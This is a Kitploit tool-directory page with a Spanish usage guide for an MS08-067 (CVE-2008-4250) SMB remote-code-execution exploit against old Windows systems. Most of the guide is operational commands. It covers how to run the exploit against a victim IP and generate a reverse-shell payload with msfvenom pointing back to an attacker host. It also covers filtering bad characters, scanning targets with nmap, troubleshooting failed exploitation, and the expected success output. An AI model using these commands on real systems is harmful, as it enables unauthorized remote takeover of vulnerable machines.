Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
Outils/GitHubGitHub/notrustedx/exploit_ms08-067
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionOutil d'Accès à Distance
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Guía Completa de Uso: # Exploit MS08-067 Mejorado

📌 Uso Básico

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 Ejemplos Prácticos

1. Windows XP SP0/SP1 (Puerto Default 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 English (Puerto 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. Con Shellcode Personalizado

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
Télécharger l’outil

🔍 Parámetros Obligatorios

ParámetroDescripciónValores Válidos
IP_VÍCTIMAIP del objetivoCualquier IPv4
VERSIÓN_OSVersión del SO vulnerable1-7 (ver tabla)

📋 Tabla de Versiones SOPORTADAS

ValorSistema OperativoArquitectura
1Windows XP SP0/SP1 Universalx86
2Windows 2000 Universalx86
.........

⚙️ Opciones Adicionales

OpciónDescripciónDefault
-p/--portPuerto SMB (445/139)445
-t/--timeoutTimeout en segundos5
-s/--shellcodeRuta a shellcode personalizadoNone

🛠️ Generación de Shellcode con msfvenom

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 Identificación del Objetivo

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 Solución de Problemas Comunes

Error: STATUS_OBJECT_NAME_NOT_FOUND

  1. Verifica si el servicio Browser está activo:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. Prueba con otro pipe (modifica el script):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

Shellcode no ejecuta

  • Verifica caracteres prohibidos: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • Usa este comando para validar:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 Recomendaciones Éticas

✅ Usar solo en entornos autorizados
❌ Nunca en sistemas de producción sin permiso

📊 Salida Exitosa Esperada

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ Nota: Este exploit no funciona en sistemas parcheados con el boletín MS08-067.